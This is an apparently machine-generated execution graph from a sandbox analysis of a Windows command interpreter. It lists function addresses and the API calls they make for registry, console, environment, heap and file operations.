                                                                                                                                                                                                                          execution_graph 22934 1b6910 22935 1b692c 22934->22935 22936 1b6921 22934->22936 22937 1b5e03 461 API calls 22935->22937 22940 1b5e03 22936->22940 22939 1b6926 22937->22939 22962 1a71a8 22940->22962 22942 1b5e0f RegOpenKeyExW 22943 1b5e45 22942->22943 22953 1b5ef8 22942->22953 22944 19bc30 448 API calls 22943->22944 22945 1b5e57 22944->22945 22946 1a0060 5 API calls 22945->22946 22954 1b5e64 22945->22954 22948 1b5e77 22946->22948 22950 19acb0 448 API calls 22948->22950 22949 1b5e6e 23029 1b5f1c 22949->23029 22952 1b5e7e 22950->22952 22952->22949 22952->22954 22956 1b5e9b 22952->22956 22953->22939 22963 1b5948 22954->22963 22955 1b5ea0 22957 1978e4 448 API calls 22955->22957 22956->22955 22958 19acb0 448 API calls 22956->22958 22957->22949 22959 1b5ec1 22958->22959 22959->22949 22959->22955 22960 1b5edc 22959->22960 23001 1b6650 22960->23001 22962->22942 22964 1b5af8 22963->22964 22970 1b5970 22963->22970 22966 1b5afe 22964->22966 22967 1b5b16 22964->22967 22965 1b5990 RegEnumKeyExW 22965->22970 22971 1b5ae7 22965->22971 22968 1978e4 448 API calls 22966->22968 22969 19ab7f 2 API calls 22967->22969 22968->22971 22972 1b5b1d 22969->22972 22970->22965 22970->22971 22981 1b5ae2 22970->22981 22985 19dc60 2 API calls 22970->22985 22989 199950 448 API calls 22970->22989 23034 1b62b3 22970->23034 22974 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 22971->22974 22973 19acb0 448 API calls 22972->22973 22975 1b5b24 22973->22975 22976 1b5c52 22974->22976 22975->22971 22977 1a01f5 wcsrchr 22975->22977 22976->22949 22978 1b5b3c 22977->22978 22978->22978 22980 1b5b68 22978->22980 22986 1b5b7f 22978->22986 22983 1978e4 448 API calls 22980->22983 22982 1a6c78 4 API calls 22981->22982 22982->22971 22984 1b5b74 22983->22984 22987 19dc60 2 API calls 22984->22987 22985->22970 22988 1b5b9e RegOpenKeyExW 22986->22988 22987->22971 22990 1b5bd6 22988->22990 22991 1b5bc4 22988->22991 22989->22970 22993 1b62b3 452 API calls 22990->22993 22992 1978e4 448 API calls 22991->22992 22992->22984 22994 1b5be7 22993->22994 22995 1b5c21 22994->22995 22998 1b5c13 22994->22998 22996 1978e4 448 API calls 22995->22996 22997 1b5c1f 22996->22997 22999 19dc60 2 API calls 22997->22999 23000 199950 448 API calls 22998->23000 22999->22984 23000->22997 23002 1b6680 23001->23002 23002->23002 23003 1b669b 23002->23003 23010 1b66b0 23002->23010 23004 1978e4 448 API calls 23003->23004 23027 1b66a6 23004->23027 23005 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 23007 1b68da 23005->23007 23006 1b6729 RegOpenKeyExW 23008 1b6831 23006->23008 23009 1b6755 23006->23009 23007->22949 23012 1b689c RegDeleteValueW 23008->23012 23015 1b683c RegSetValueExW 23008->23015 23011 1b681c 23009->23011 23019 1b6768 23009->23019 23010->23006 23013 1978e4 448 API calls 23011->23013 23014 1b68af 23012->23014 23012->23027 23013->23027 23016 1978e4 448 API calls 23014->23016 23020 1b6873 23015->23020 23021 1b6881 23015->23021 23016->23027 23017 1b67a4 RegCreateKeyExW 23017->23019 23022 1b6801 23017->23022 23019->23008 23019->23017 23025 199950 448 API calls 23020->23025 23023 1978e4 448 API calls 23021->23023 23024 1978e4 448 API calls 23022->23024 23026 1b688a 23023->23026 23024->23027 23025->23027 23028 1978e4 448 API calls 23026->23028 23027->23005 23028->23027 23030 19dc60 2 API calls 23029->23030 23031 1b5f23 23030->23031 23032 19dc60 2 API calls 23031->23032 23033 1b5f2a 23032->23033 23033->22953 23035 1b62bf 23034->23035 23036 1b62f3 RegQueryValueExW 23035->23036 23037 1b62dd RegOpenKeyExW 23035->23037 23038 1b631d 23036->23038 23039 1b630c 23036->23039 23037->23036 23040 1b62f0 SetLastError 23037->23040 23038->23040 23042 19dcd0 448 API calls 23038->23042 23041 19acb0 448 API calls 23039->23041 23047 1b6316 23040->23047 23041->23047 23044 1b6329 23042->23044 23044->23040 23045 1b6332 RegQueryValueExW 23044->23045 23046 1b634c 23045->23046 23045->23047 23048 19dc60 2 API calls 23046->23048 23047->22970 23048->23040 18440 1a6903 18442 1a690f 18440->18442 18441 1a6934 18444 1a6953 _amsg_exit 18441->18444 18445 1a695d 18441->18445 18442->18441 18443 1a693b Sleep 18442->18443 18443->18442 18444->18445 18446 1a699f _initterm 18445->18446 18447 1a6980 18445->18447 18449 1a69ba __IsNonwritableInCurrentImage 18445->18449 18446->18449 18454 1a09b1 GetCurrentThreadId OpenThread 18449->18454 18513 19e2af 18454->18513 18456 1a09e8 HeapSetInformation RegOpenKeyExW 18457 1a0a18 18456->18457 18458 1ae9c5 RegQueryValueExW 18456->18458 18523 1a1f5b 18457->18523 18461 1ae9f0 18458->18461 18676 1963bd 18461->18676 18463 1a0a41 18536 1987ca 8 API calls 18463->18536 18470 1aea58 _setjmp3 18473 1aea6f 18470->18473 18474 1aea82 18470->18474 18472 1aea08 18486 1a0a87 18472->18486 18691 1a1e70 18472->18691 18473->18474 18476 1aea73 18473->18476 18477 1963bd 448 API calls 18474->18477 18499 1aeaa4 18474->18499 18479 1a1e70 448 API calls 18476->18479 18505 1aea3c 18476->18505 18480 1aea92 18477->18480 18479->18476 18483 1b4840 453 API calls 18480->18483 18481 1aea52 18481->18470 18482 1aeab1 18484 1aeac6 18482->18484 18485 1aeab5 _setmode 18482->18485 18494 1aea9a 18483->18494 18702 1a62c0 18484->18702 18485->18484 18486->18481 18495 1a0ada exit 18486->18495 18498 1a1e70 448 API calls 18486->18498 18500 1aea32 18486->18500 18602 19e310 _get_osfhandle SetConsoleMode _get_osfhandle GetConsoleMode 18486->18602 18611 19c570 18486->18611 18627 19e470 18486->18627 18489 1aeacc EnterCriticalSection LeaveCriticalSection 18492 19c570 580 API calls 18489->18492 18491 1a1e70 448 API calls 18491->18494 18496 1aeafa 18492->18496 18494->18491 18494->18499 18495->18486 18496->18489 18503 1aeb06 EnterCriticalSection LeaveCriticalSection GetConsoleOutputCP GetCPInfo 18496->18503 18504 1aeb75 18496->18504 18497 19e2af 4 API calls 18497->18486 18498->18486 18697 19dd98 _get_osfhandle GetFileType 18499->18697 18502 1a1e70 448 API calls 18500->18502 18500->18505 18502->18500 18506 19e2af 4 API calls 18503->18506 18504->18505 18507 1a1e70 448 API calls 18504->18507 18508 1aeb40 18506->18508 18507->18504 18509 19e470 917 API calls 18508->18509 18510 19e310 12 API calls 18508->18510 18509->18508 18511 1aeb54 GetConsoleOutputCP GetCPInfo 18510->18511 18512 19e2af 4 API calls 18511->18512 18512->18496 18514 19e2ca 18513->18514 18515 19e2bc SetThreadUILanguage 18513->18515 18516 19e2ef 18514->18516 18517 19e2d4 GetModuleHandleW 18514->18517 18515->18456 18519 19e307 18516->18519 18520 19e2f3 GetProcAddress 18516->18520 18517->18516 18517->18519 18519->18515 18521 19e30b SetThreadLocale 18519->18521 18520->18519 18521->18456 18524 1a1f91 18523->18524 18525 1a0a31 18523->18525 18524->18525 18526 1a1fab VirtualQuery 18524->18526 18529 1a1f1a GetConsoleOutputCP GetCPInfo 18525->18529 18526->18525 18528 1a1fbd 18526->18528 18527 1a1fc7 VirtualQuery 18527->18525 18527->18528 18528->18525 18528->18527 18530 1a1f39 memset 18529->18530 18531 1af185 GetThreadLocale 18529->18531 18532 1a1f5a 18530->18532 18533 1af196 18530->18533 18531->18533 18532->18463 18534 1af20b 18533->18534 18535 1af1ee memset 18533->18535 18534->18463 18535->18533 18537 19e310 12 API calls 18536->18537 18538 19884f 18537->18538 18733 19a9d4 GetEnvironmentStringsW 18538->18733 18542 19885e 18747 198273 18542->18747 18545 198873 18545->18545 18546 198b2f 18545->18546 18768 1a1a05 18545->18768 18548 1978e4 448 API calls 18546->18548 18551 198b42 18548->18551 18550 1988a5 GetCommandLineW 18552 1988b8 18550->18552 19067 1a7d18 18551->19067 18773 19e3f0 18552->18773 18557 1988e1 18784 198e9e 18557->18784 18603 19e343 18602->18603 18604 19e357 _get_osfhandle GetConsoleMode 18602->18604 18603->18604 18605 19e3bc _get_osfhandle SetConsoleMode 18603->18605 18606 19e372 18604->18606 18609 19e3a0 GetConsoleOutputCP GetCPInfo 18604->18609 18605->18604 18608 19e3df 18605->18608 18607 19e381 _get_osfhandle SetConsoleMode 18606->18607 18606->18609 18607->18609 18608->18604 18610 1adc1d _get_osfhandle SetConsoleMode 18608->18610 18609->18497 18610->18604 18612 19c5d3 18611->18612 18613 19c594 18611->18613 18615 19c695 VirtualFree 18612->18615 18616 19c5fe _setjmp3 18612->18616 18613->18612 18614 19c59e GetProcessHeap RtlFreeHeap 18613->18614 18614->18612 18614->18613 18615->18612 18617 19c666 18615->18617 18618 19c63c 18616->18618 18619 19c683 18616->18619 18621 19c66f 18617->18621 20275 1b8959 18617->20275 20255 19a8c4 18618->20255 18619->18486 18621->18619 20284 1b8791 18621->20284 18622 19c64d 18622->18621 20266 19cc70 18622->20266 18625 1ad0f0 18625->18625 18628 19e517 18627->18628 18629 19e48a 18627->18629 18628->18486 18629->18628 18630 19e4ae memset 18629->18630 18631 19e4cc 18629->18631 20961 19e670 18630->20961 18633 19e5ad 18631->18633 18634 19e501 18631->18634 18638 19e4d9 18631->18638 18637 19dcd0 448 API calls 18633->18637 18634->18628 18647 19e670 457 API calls 18634->18647 18635 19e4e9 18640 19e4ef 18635->18640 18641 19e531 18635->18641 18636 19e572 20994 199ef2 memset 18636->20994 18642 19e5b7 18637->18642 18638->18635 18638->18636 20888 19ad60 GetConsoleTitleW 18640->20888 18644 19e55f 18641->18644 18645 19e544 18641->18645 18642->18634 18648 19e627 18642->18648 21099 19ed90 18642->21099 20989 19ab50 18644->20989 18650 19e588 18645->18650 18651 19e54c 18645->18651 18647->18628 21133 1a57ea 18648->21133 18649 19e583 18649->18634 21044 1a0390 18650->21044 18656 19e592 18651->18656 18657 19e554 18651->18657 18661 19e4f6 18656->18661 21047 1a0740 18656->21047 20976 1a03b0 18657->20976 18659 19e631 18659->18634 18666 19dcd0 448 API calls 18659->18666 18661->18634 18664 19a125 2 API calls 18661->18664 18662 19e5dd 18665 19f410 464 API calls 18662->18665 18664->18634 18667 19e5eb 18665->18667 18668 19e641 18666->18668 18667->18648 18669 19e5f0 18667->18669 18668->18634 18670 19e64b 18668->18670 18671 199ef2 459 API calls 18669->18671 18672 19ec2e 448 API calls 18670->18672 18673 19e5f9 18671->18673 18672->18669 18673->18634 21103 1a2081 18673->21103 18677 19790c 448 API calls 18676->18677 18678 1963dc 18677->18678 18679 1b4840 GetStdHandle 18678->18679 18680 1963bd 448 API calls 18679->18680 18681 1b485e 18680->18681 18682 1b48c5 18681->18682 18683 19dd98 6 API calls 18681->18683 18684 199950 448 API calls 18682->18684 18685 1b486b 18683->18685 18686 1b48cf 18684->18686 18687 1b48b5 18685->18687 18688 1b4878 FlushConsoleInputBuffer _getch 18685->18688 18686->18472 18689 1b4799 448 API calls 18687->18689 18688->18682 18690 1b4891 EnterCriticalSection LeaveCriticalSection 18688->18690 18689->18682 18690->18682 22584 1a1ea6 18691->22584 18693 1a1e7c 18694 1a1e82 18693->18694 18695 198bc7 446 API calls 18693->18695 18694->18472 18696 1a1e92 GetProcessHeap RtlFreeHeap 18695->18696 18696->18694 18699 19ddca 18697->18699 18701 19ddbd 18697->18701 18698 19ddd6 GetStdHandle 18700 19ddde AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 18698->18700 18699->18698 18699->18700 18700->18701 18701->18482 22592 1a643a NtOpenThreadToken 18702->22592 18705 1b1ef3 RtlNtStatusToDosError SetLastError 18708 1b1f01 18705->18708 18706 1b1f51 18711 1b1f59 GetConsoleTitleW 18706->18711 18707 1a6302 18707->18706 18707->18708 18710 1a6319 18707->18710 18709 1b1fdc 18708->18709 18712 19ab7f 2 API calls 18708->18712 22601 1a640a FormatMessageW 18710->22601 18714 1b1f79 wcsstr 18711->18714 18715 1a63c1 18711->18715 18726 1a6395 18712->18726 18714->18715 18716 1b1f92 18714->18716 18715->18709 18718 1a63d8 18715->18718 18723 19dc60 2 API calls 18715->18723 18722 1b1fa0 wcsstr 18716->18722 18717 1b1f3d 18719 1978e4 448 API calls 18717->18719 18720 1a63e9 18718->18720 18721 1a63e2 LocalFree 18718->18721 18724 1b1f4a 18719->18724 18720->18717 18725 1a63f1 18720->18725 18721->18720 18722->18715 18722->18722 18723->18718 18724->18489 18728 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 18725->18728 18726->18715 18726->18717 18730 1a63b4 SetConsoleTitleW 18726->18730 18727 1a6332 18727->18717 18727->18718 18731 19dcd0 448 API calls 18727->18731 18729 1a6400 18728->18729 18729->18489 18730->18715 18732 1a6369 18731->18732 18732->18711 18732->18718 18732->18726 18734 198854 18733->18734 18735 19a9e6 18733->18735 18739 198b96 GetProcessHeap HeapAlloc 18734->18739 18736 19a9ee GetProcessHeap RtlAllocateHeap 18735->18736 18737 19aa11 FreeEnvironmentStringsW 18736->18737 18738 19aa06 memcpy 18736->18738 18737->18734 18738->18737 18740 1ab5ce 18739->18740 18741 198bb4 18739->18741 18740->18542 18742 19a9d4 5 API calls 18741->18742 18743 198bb9 18742->18743 18744 1ab5b2 GetProcessHeap RtlFreeHeap 18743->18744 18745 198bc3 18743->18745 18746 1978e4 448 API calls 18744->18746 18745->18542 18746->18740 18766 198282 18747->18766 18748 1982bd RegOpenKeyExW 18749 1982e1 RegQueryValueExW 18748->18749 18748->18766 18750 198321 RegQueryValueExW 18749->18750 18749->18766 18752 198371 RegQueryValueExW 18750->18752 18750->18766 18751 198552 time srand 18753 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 18751->18753 18755 1983ab RegQueryValueExW 18752->18755 18752->18766 18756 198570 GetCommandLineW 18753->18756 18754 1ab11a _wtol 18754->18750 18758 1983fb RegQueryValueExW 18755->18758 18755->18766 18756->18545 18757 1ab146 _wtol 18757->18752 18760 19846c RegQueryValueExW 18758->18760 18758->18766 18759 1ab18e _wtol 18759->18755 18760->18766 18761 1ab1ba wcstol 18761->18766 18762 1ab1dc wcstol 18762->18766 18763 1ab218 wcstol 18763->18766 18764 1984fa RegQueryValueExW 18764->18766 18765 1ab28c ExpandEnvironmentStringsW 18765->18766 18766->18748 18766->18750 18766->18751 18766->18752 18766->18754 18766->18755 18766->18757 18766->18758 18766->18759 18766->18760 18766->18761 18766->18762 18766->18763 18766->18764 18766->18765 19071 19acb0 18766->19071 19081 1a6e25 18768->19081 18770 1a1a27 18771 1a1a2f memset 18770->18771 18772 19889a 18770->18772 18771->18772 18772->18546 18772->18550 18774 1988d9 18773->18774 18775 19e405 18773->18775 18774->18546 18774->18557 18776 1a6e25 4 API calls 18775->18776 18777 19e422 18776->18777 18778 1adc4a 18777->18778 18779 19e42d 18777->18779 19093 1b34d4 18778->19093 18780 1adc6b ??_V@YAXPAX 18779->18780 18781 19e441 memset 18779->18781 18781->18774 18785 198ede towupper 18784->18785 18786 198ec1 GetCurrentDirectoryW 18784->18786 19163 19ec2e GetEnvironmentVariableW 18785->19163 18792 198ec9 18786->18792 18788 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 18790 1988fc 18788->18790 18793 1a00e9 memset 18790->18793 18791 1ab787 towupper 18792->18788 18794 19e3f0 17 API calls 18793->18794 18795 1a013e 18794->18795 18796 1a0146 18795->18796 18797 1ae615 18795->18797 18799 1a0151 GetModuleFileNameW 18796->18799 18800 1ae627 18796->18800 18798 1a1e70 448 API calls 18797->18798 18802 1ae61f exit 18797->18802 18798->18797 18801 19ec2e 448 API calls 18799->18801 19306 19a976 18800->19306 18803 1a0168 18801->18803 18802->18800 18803->18800 18805 1a0170 18803->18805 18807 19ec2e 448 API calls 18805->18807 18806 1ae63e 18811 19a976 8 API calls 18806->18811 18808 1a017c 18807->18808 18808->18806 18809 1a0184 18808->18809 18810 19ec2e 448 API calls 18809->18810 18812 1a0190 18810->18812 18813 1ae64f 18811->18813 18812->18813 18815 19a976 8 API calls 18813->18815 19068 1a7d1d 19067->19068 19069 1a1e70 448 API calls 19068->19069 19070 1a7d28 exit 19068->19070 19069->19068 19072 19acc0 19071->19072 19072->19072 19075 19dcd0 19072->19075 19074 19acd8 19074->18766 19076 1ad9da 19075->19076 19077 19dcde GetProcessHeap HeapAlloc 19075->19077 19079 1978e4 446 API calls 19076->19079 19077->19076 19078 19dcf6 19077->19078 19078->19074 19080 1ad9e3 19079->19080 19080->19074 19082 1a6e30 __EH_prolog3_catch 19081->19082 19085 1a742d 19082->19085 19084 1a6e48 19084->18770 19086 1a7441 malloc 19085->19086 19087 1a744f 19086->19087 19088 1a7434 _callnewh 19086->19088 19087->19084 19088->19086 19089 1a7451 19088->19089 19092 1a74d1 ??0exception@@QAE@ABQBDH 19089->19092 19091 1a77ec _CxxThrowException 19092->19091 19096 1b345e 19093->19096 19099 1b32e4 19096->19099 19100 1b32f6 19099->19100 19107 1b2e74 19100->19107 19102 1b33a9 19104 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19102->19104 19106 1b33ba 19104->19106 19106->18774 19108 1b2ea3 19107->19108 19110 1b2ead 19107->19110 19109 1b345e 9 API calls 19108->19109 19108->19110 19109->19110 19111 1b2f1d GetCurrentThreadId 19110->19111 19113 1b2f6c 19111->19113 19112 1b3061 19113->19112 19123 1b2e37 19113->19123 19116 1b3036 OutputDebugStringW 19118 1b2fe7 19116->19118 19118->19102 19119 1b392b 19118->19119 19120 1b394c memset 19119->19120 19121 1b3941 19119->19121 19122 1b397a 19120->19122 19121->19120 19124 1b2e42 19123->19124 19126 1b2e4e 19123->19126 19125 1b2e5d IsDebuggerPresent 19124->19125 19124->19126 19125->19126 19126->19116 19126->19118 19127 1b2859 19126->19127 19128 1b2a23 19127->19128 19131 1b2885 19127->19131 19129 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19128->19129 19130 1b2a60 19129->19130 19130->19116 19131->19128 19132 1b290d FormatMessageW 19131->19132 19133 1b294c 19132->19133 19134 1b2963 19132->19134 19156 1b3067 19133->19156 19136 1b3067 _vsnwprintf 19134->19136 19137 1b295e 19136->19137 19138 1b298e GetCurrentThreadId 19137->19138 19139 1b3067 _vsnwprintf 19137->19139 19159 199a8d 19156->19159 19160 199a98 19159->19160 19164 19ec64 19163->19164 19165 198f0d 19163->19165 19164->19165 19166 19ec71 _wcsicmp 19164->19166 19165->18791 19165->18792 19167 19ed59 19166->19167 19168 19ec87 _wcsicmp 19166->19168 19169 198e9e 436 API calls 19167->19169 19170 19ec9d _wcsicmp 19168->19170 19171 19ed47 19168->19171 19173 19ed6c 19169->19173 19170->19171 19172 19ecb3 _wcsicmp 19170->19172 19213 199abf 19171->19213 19174 19ecc9 _wcsicmp 19172->19174 19175 1addef GetCommandLineW 19172->19175 19217 196854 19173->19217 19174->19173 19177 19ecdf _wcsicmp 19174->19177 19175->19165 19178 19ecf1 _wcsicmp 19177->19178 19179 19ed24 19177->19179 19181 1addfa rand 19178->19181 19182 19ed07 _wcsicmp 19178->19182 19188 199310 19179->19188 19181->19171 19182->19165 19185 1ade06 GetNumaHighestNodeNumber 19182->19185 19183 19ed30 19183->19165 19256 1a6c78 19183->19256 19185->19171 19189 19933b GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19188->19189 19190 1abbbc 19188->19190 19191 1abbd9 19189->19191 19192 19938d 19189->19192 19259 1b48d7 19190->19259 19203 1abbd1 19191->19203 19265 198791 GetUserDefaultLCID 19191->19265 19194 1993cd 19192->19194 19195 1abbcc 19192->19195 19198 199abf _vsnwprintf 19194->19198 19199 199950 441 API calls 19195->19199 19201 1993d6 19198->19201 19199->19203 19204 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19201->19204 19202 199abf _vsnwprintf 19202->19203 19203->19202 19211 1abdbf 19203->19211 19267 19998d 19203->19267 19207 1993fe 19204->19207 19205 198791 GetUserDefaultLCID 19206 1abc11 19209 1abd10 19206->19209 19212 1abcd0 memmove 19206->19212 19207->19183 19209->19205 19212->19206 19214 199acd 19213->19214 19215 199aee 19214->19215 19303 199afb _vsnwprintf 19214->19303 19215->19167 19218 19688f GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19217->19218 19219 196b0c 19217->19219 19221 1968ec 19218->19221 19241 1aa562 19218->19241 19220 1b48d7 6 API calls 19219->19220 19222 1aa4c2 19220->19222 19223 198791 GetUserDefaultLCID 19221->19223 19222->19183 19224 196906 GetLocaleInfoW 19223->19224 19242 196915 19224->19242 19225 1aa5f9 19229 199abf _vsnwprintf 19225->19229 19226 1aa5df realloc 19226->19225 19226->19241 19227 196966 19228 198791 GetUserDefaultLCID 19227->19228 19230 19698e GetDateFormatW 19228->19230 19231 1aa62a 19229->19231 19232 19699d 19230->19232 19233 196a96 19230->19233 19237 1aa63e 19231->19237 19247 1aa64d 19231->19247 19232->19233 19240 1969ab 19232->19240 19235 198791 GetUserDefaultLCID 19233->19235 19234 1978e4 434 API calls 19234->19241 19243 199950 434 API calls 19237->19243 19240->19231 19241->19225 19241->19226 19241->19234 19242->19227 19245 1aa523 memmove 19242->19245 19249 196a75 memmove 19242->19249 19253 1aa649 19243->19253 19245->19242 19252 199950 434 API calls 19247->19252 19249->19242 19252->19253 19305 1a6b40 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19256->19305 19258 19ed88 19258->19175 19260 1b48fc 19259->19260 19261 1b48f0 GetSystemTime 19259->19261 19262 1b493b SystemTimeToFileTime 19260->19262 19261->19262 19263 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19262->19263 19264 1abbc7 19263->19264 19264->19183 19266 1987a5 GetLocaleInfoW 19265->19266 19266->19206 19268 1999d0 19267->19268 19269 1999a0 19267->19269 19268->19203 19270 199a11 6 API calls 19269->19270 19271 1999a8 19270->19271 19304 199b1f 19303->19304 19304->19215 19305->19258 19307 19a9a2 SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 19306->19307 19308 19a986 19306->19308 19309 19a9d4 5 API calls 19307->19309 19308->19307 19310 19a9c5 19309->19310 19310->18806 20256 19a8e6 20255->20256 20257 19cc70 548 API calls 20256->20257 20258 19a8f8 20257->20258 20259 1a80ba longjmp 20258->20259 20260 19a90c 20258->20260 20262 1a80c8 20259->20262 20301 19bab0 20260->20301 20314 19d660 EnterCriticalSection LeaveCriticalSection 20262->20314 20263 19a911 20263->18622 20265 1a80cd 20265->18622 20267 19cc7a 20266->20267 20268 19cf10 547 API calls 20267->20268 20269 19cc8a 20268->20269 20270 1ad434 longjmp 20269->20270 20271 19cc9b 20269->20271 20270->20271 20272 199950 448 API calls 20271->20272 20273 19ccc4 20271->20273 20274 1ad45b 20272->20274 20273->18617 20276 1b8996 20275->20276 20277 1b898e 20275->20277 20278 1b89b2 20276->20278 20279 1b89a2 20276->20279 20281 1b89db 20277->20281 20282 1b89ce longjmp 20277->20282 20278->20277 20283 1978e4 448 API calls 20278->20283 20280 1978e4 448 API calls 20279->20280 20280->20277 20281->18621 20282->20281 20283->20277 20300 1b87a0 20284->20300 20285 1b8900 20287 199950 448 API calls 20285->20287 20286 1b8930 20290 199950 448 API calls 20286->20290 20289 1b890f 20287->20289 20292 1b8925 20289->20292 20296 199950 448 API calls 20289->20296 20294 1b892e 20290->20294 20291 1b88be 20291->20285 20293 1b88c3 20291->20293 20872 1b871d 20292->20872 20293->20286 20298 1b88d2 20293->20298 20294->18625 20295 199950 448 API calls 20295->20300 20296->20292 20879 1b86e6 20298->20879 20299 1b8791 448 API calls 20299->20300 20300->20285 20300->20286 20300->20291 20300->20294 20300->20295 20300->20298 20300->20299 20310 19bb19 20301->20310 20313 19bac2 20301->20313 20302 19badc _wcsicmp 20303 19baf3 20302->20303 20305 19bb68 20302->20305 20306 19bb56 20303->20306 20399 19ccd0 20303->20399 20305->20303 20308 19cc70 548 API calls 20305->20308 20306->20263 20307 19bb15 20307->20263 20308->20305 20309 19cc70 548 API calls 20309->20310 20310->20309 20311 19bb48 20310->20311 20310->20313 20311->20306 20312 19cc70 548 API calls 20311->20312 20312->20313 20313->20302 20313->20303 20315 19d6b0 20314->20315 20316 1ad587 20315->20316 20318 19d6c6 EnterCriticalSection LeaveCriticalSection 20315->20318 20323 19d971 20315->20323 20317 1ad59b 20316->20317 20319 1963bd 448 API calls 20316->20319 20715 1b769e 20317->20715 20321 19d6f5 _get_osfhandle SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20318->20321 20322 1ad5a8 20318->20322 20319->20317 20326 19d752 20321->20326 20748 1b9fcf _get_osfhandle GetFileType 20322->20748 20323->20323 20693 19da30 20323->20693 20329 19d81c 20326->20329 20331 1ad742 memcmp 20326->20331 20338 19d774 20326->20338 20327 1ad5be 20330 1ad6bd 20327->20330 20334 19dd98 6 API calls 20327->20334 20328 19d980 20328->20265 20333 19d9f7 GetLastError 20329->20333 20343 19d82c 20329->20343 20330->20326 20332 1ad6c6 _get_osfhandle 20330->20332 20340 1ad6ef GetLastError 20330->20340 20330->20343 20331->20338 20335 1b45f9 10 API calls 20332->20335 20333->20343 20336 1ad5cd 20334->20336 20335->20330 20336->20330 20337 1ad5de 20336->20337 20337->20321 20342 19dd98 6 API calls 20337->20342 20339 1ad78e AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20338->20339 20341 19d7b2 20338->20341 20344 19d7bd SetFilePointer 20338->20344 20339->20341 20349 19d809 20339->20349 20340->20326 20340->20330 20346 1ad7e9 20341->20346 20347 19d7ec MultiByteToWideChar 20341->20347 20341->20349 20348 1ad5f2 20342->20348 20353 19dd98 6 API calls 20343->20353 20355 19d840 20343->20355 20344->20341 20350 1ad7f0 EnterCriticalSection LeaveCriticalSection longjmp 20346->20350 20347->20349 20351 1ad6b3 20348->20351 20354 1ad607 20348->20354 20349->20329 20349->20350 20350->20343 20351->20321 20352 19d893 20352->20265 20356 1ad826 20353->20356 20357 1ad61f EnterCriticalSection LeaveCriticalSection _get_osfhandle 20354->20357 20358 1ad610 20354->20358 20355->20352 20365 19d8f6 20355->20365 20366 19d8d7 wcschr 20355->20366 20356->20355 20361 1b9922 448 API calls 20356->20361 20360 1b4191 448 API calls 20357->20360 20749 1b7613 _get_osfhandle 20358->20749 20362 1ad665 20360->20362 20363 1ad84f longjmp 20361->20363 20362->20333 20364 1ad66d 20362->20364 20363->20355 20364->20343 20367 1ad677 GetLastError 20364->20367 20372 19d9e3 20365->20372 20375 19d904 20365->20375 20366->20355 20366->20365 20368 1ad689 20367->20368 20369 1ad69e 20367->20369 20370 199950 448 API calls 20368->20370 20371 199950 448 API calls 20369->20371 20374 1ad68e longjmp 20370->20374 20371->20343 20372->20323 20379 19d9eb 20372->20379 20373 1ad908 20373->20265 20374->20369 20375->20373 20377 19dd98 6 API calls 20375->20377 20376 1ad8d3 20381 1978e4 448 API calls 20376->20381 20380 19d945 20377->20380 20378 1ad8af 20384 1978e4 448 API calls 20378->20384 20379->20376 20379->20378 20383 1b769e 458 API calls 20379->20383 20380->20323 20385 19d949 _get_osfhandle SetFilePointer 20380->20385 20382 1ad8df 20381->20382 20386 1ad8fb longjmp 20382->20386 20389 19dd98 6 API calls 20382->20389 20387 1ad898 20383->20387 20388 1ad8be 20384->20388 20385->20323 20396 1ad915 20385->20396 20386->20373 20390 199950 448 API calls 20387->20390 20391 1b9922 448 API calls 20388->20391 20392 1ad8f2 20389->20392 20393 1ad8a2 20390->20393 20394 1ad8c6 longjmp 20391->20394 20392->20386 20754 1ba0da 20392->20754 20395 199950 448 API calls 20393->20395 20394->20376 20395->20378 20396->20323 20398 19998d 448 API calls 20396->20398 20398->20323 20400 19cce9 20399->20400 20401 19cd14 20399->20401 20402 19cde8 20400->20402 20403 19ccf5 20400->20403 20442 19de30 20401->20442 20513 19e090 20402->20513 20405 19cd01 20403->20405 20406 19cdf2 20403->20406 20408 19cd12 20405->20408 20439 19e230 20405->20439 20516 19e210 20406->20516 20409 19cddd 20408->20409 20458 19cf10 _setjmp3 20408->20458 20409->20307 20413 19cd48 20414 19cd59 20413->20414 20415 1ad478 longjmp 20413->20415 20416 1ad48f 20414->20416 20424 19cd85 20414->20424 20415->20416 20417 199950 448 API calls 20416->20417 20418 1ad49f 20417->20418 20419 1b9922 448 API calls 20418->20419 20420 1ad4ac longjmp 20419->20420 20422 1ad4ba 20420->20422 20421 19ce4a 20427 19cc70 548 API calls 20421->20427 20431 19ce61 20421->20431 20434 19ce6c 20421->20434 20425 199950 448 API calls 20422->20425 20423 19cdd2 20426 19cf10 547 API calls 20423->20426 20424->20421 20424->20423 20429 1ad4ca 20425->20429 20426->20409 20427->20421 20428 19dcd0 448 API calls 20430 19ce89 20428->20430 20429->20307 20430->20418 20432 19ce93 20430->20432 20433 19cf10 547 API calls 20431->20433 20435 19cc70 548 API calls 20432->20435 20433->20434 20434->20409 20434->20428 20436 19ceac 20435->20436 20437 19bab0 574 API calls 20436->20437 20438 19cec6 20436->20438 20437->20438 20438->20307 20440 19ccd0 576 API calls 20439->20440 20441 19e247 20440->20441 20441->20408 20519 19ded0 20442->20519 20444 19de4a 20445 19de52 20444->20445 20446 1ada16 20444->20446 20537 19e0b0 20445->20537 20448 19cc70 548 API calls 20446->20448 20451 19de57 20448->20451 20449 19de64 20450 19cc70 548 API calls 20449->20450 20456 19de92 20449->20456 20452 19de75 20450->20452 